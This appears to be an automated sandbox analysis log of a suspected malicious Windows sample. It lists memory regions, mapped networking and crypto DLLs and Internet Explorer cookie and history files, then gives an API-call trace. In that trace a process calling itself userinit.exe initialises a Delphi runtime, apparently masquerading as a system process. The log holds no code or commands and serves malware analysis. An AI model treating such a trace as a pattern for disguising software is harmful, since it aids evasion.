entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3644
start_va = 0x27d0000
end_va = 0x2890fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3645
start_va = 0x1570000
end_va = 0x1632fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3646
start_va = 0x27d0000
end_va = 0x2894fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3649
start_va = 0x1570000
end_va = 0x1636fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3650
start_va = 0x27d0000
end_va = 0x2898fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3651
start_va = 0x1570000
end_va = 0x163afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3654
start_va = 0x27d0000
end_va = 0x289cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3655
start_va = 0x1570000
end_va = 0x163efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3658
start_va = 0x27d0000
end_va = 0x28a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3659
start_va = 0x1570000
end_va = 0x1642fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3660
start_va = 0x27d0000
end_va = 0x28a4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3663
start_va = 0x1570000
end_va = 0x1646fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3664
start_va = 0x27d0000
end_va = 0x28a8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3667
start_va = 0x1570000
end_va = 0x164afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3668
start_va = 0x27d0000
end_va = 0x28acfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3669
start_va = 0x1570000
end_va = 0x164efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3672
start_va = 0x27d0000
end_va = 0x28b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3673
start_va = 0x28c0000
end_va = 0x29a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3677
start_va = 0x27d0000
end_va = 0x28b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3678
start_va = 0x28c0000
end_va = 0x29a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3679
start_va = 0x27d0000
end_va = 0x28b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3681
start_va = 0x28c0000
end_va = 0x29aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3682
start_va = 0x27d0000
end_va = 0x28bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3685
start_va = 0x28c0000
end_va = 0x29aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3686
start_va = 0x29b0000
end_va = 0x2aa0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 3689
start_va = 0x27d0000
end_va = 0x28c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3690
start_va = 0x28d0000
end_va = 0x29c4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3693
start_va = 0x27d0000
end_va = 0x28c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3694
start_va = 0x28d0000
end_va = 0x29c8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3696
start_va = 0x27d0000
end_va = 0x28cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3697
start_va = 0x28d0000
end_va = 0x29ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3698
start_va = 0x27d0000
end_va = 0x28cefff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3715
start_va = 0x28d0000
end_va = 0x29d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3716
start_va = 0x29e0000
end_va = 0x2ae2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 3717
start_va = 0x27d0000
end_va = 0x28d4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3723
start_va = 0x28e0000
end_va = 0x29e6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 3724
start_va = 0x27d0000
end_va = 0x28d8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3747
start_va = 0x28e0000
end_va = 0x29eafff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 3748
start_va = 0x27d0000
end_va = 0x28dcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 3749
start_va = 0x28e0000
end_va = 0x29effff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 3750
start_va = 0x29f0000
end_va = 0x2b02fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029f0000"
filename = ""
Region:
id = 3751
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3752
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3753
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 3754
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 3755
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3756
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 3757
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 3758
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x100000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 3759
start_va = 0x2b10000
end_va = 0x2c0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b10000"
filename = ""
Region:
id = 3760
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 3761
start_va = 0x6ceb0000
end_va = 0x6cec8fff
entry_point = 0x6ceb0000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 3762
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3763
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3764
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3765
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3766
start_va = 0x5d0000
end_va = 0x60ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 3767
start_va = 0x2cd0000
end_va = 0x2dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002cd0000"
filename = ""
Region:
id = 3768
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 3769
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 3770
start_va = 0x2dd0000
end_va = 0x309efff
entry_point = 0x2dd0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3771
start_va = 0x120000
end_va = 0x121fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 3772
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 3773
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x240000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 3774
start_va = 0x250000
end_va = 0x251fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 3775
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3776
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 3777
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 3778
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3779
start_va = 0x260000
end_va = 0x28bfff
entry_point = 0x260000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 3780
start_va = 0x290000
end_va = 0x297fff
entry_point = 0x290000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 3781
start_va = 0x2a0000
end_va = 0x2affff
entry_point = 0x2a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 3782
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3783
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3784
start_va = 0x1480000
end_va = 0x14fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 3785
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 3786
start_va = 0x1570000
end_va = 0x15bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 3787
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 3788
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 3789
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3790
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3791
start_va = 0x2c10000
end_va = 0x2ccffff
entry_point = 0x2c10000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 242
os_tid = 0xfd4
[0117.544] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0117.544] GetKeyboardType (nTypeFlag=0) returned 4
[0117.544] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0117.544] GetStartupInfoA (in: lpStartupInfo=0x16f774 | out: lpStartupInfo=0x16f774*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0117.544] GetVersion () returned 0x1db10106
[0117.544] GetVersion () returned 0x1db10106
[0117.544] GetCurrentThreadId () returned 0xfd4
[0117.544] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x16f270, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0117.544] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f14b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0117.544] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x16f260 | out: phkResult=0x16f260*=0x0) returned 0x2
[0117.544] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x16f260 | out: phkResult=0x16f260*=0x0) returned 0x2
[0117.545] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x16f260 | out: phkResult=0x16f260*=0x0) returned 0x2
[0117.545] lstrcpynA (in: lpString1=0x16f14b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0117.545] GetThreadLocale () returned 0x409
[0117.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x16f25b, cchData=5 | out: lpLCData="ENU") returned 4
[0117.545] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0117.545] lstrcpynA (in: lpString1=0x16f168, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0117.545] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0117.546] lstrcpynA (in: lpString1=0x16f168, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0117.546] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0117.546] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0117.546] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6b3640
[0117.546] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4c0000
[0117.546] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6b4640
[0117.546] VirtualAlloc (lpAddress=0x4c0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c0000
[0117.546] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0117.546] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x16f394, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x16f380, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0117.547] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x16f380, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0117.547] GetVersionExA (in: lpVersionInformation=0x16f718*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16f718*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0117.547] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0117.547] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0117.547] GetThreadLocale () returned 0x409
[0117.547] GetThreadLocale () returned 0x409
[0117.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Jan") returned 4
[0117.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="January") returned 8
[0117.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Feb") returned 4
[0117.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="February") returned 9
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Mar") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="March") returned 6
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Apr") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="April") returned 6
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="May") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="May") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Jun") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="June") returned 5
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Jul") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="July") returned 5
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Aug") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="August") returned 7
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Sep") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="September") returned 10
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Oct") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="October") returned 8
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Nov") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="November") returned 9
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Dec") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="December") returned 9
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Sun") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Sunday") returned 7
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Mon") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Monday") returned 7
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Tue") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Tuesday") returned 8
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Wed") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Wednesday") returned 10
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Thu") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Thursday") returned 9
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Fri") returned 4
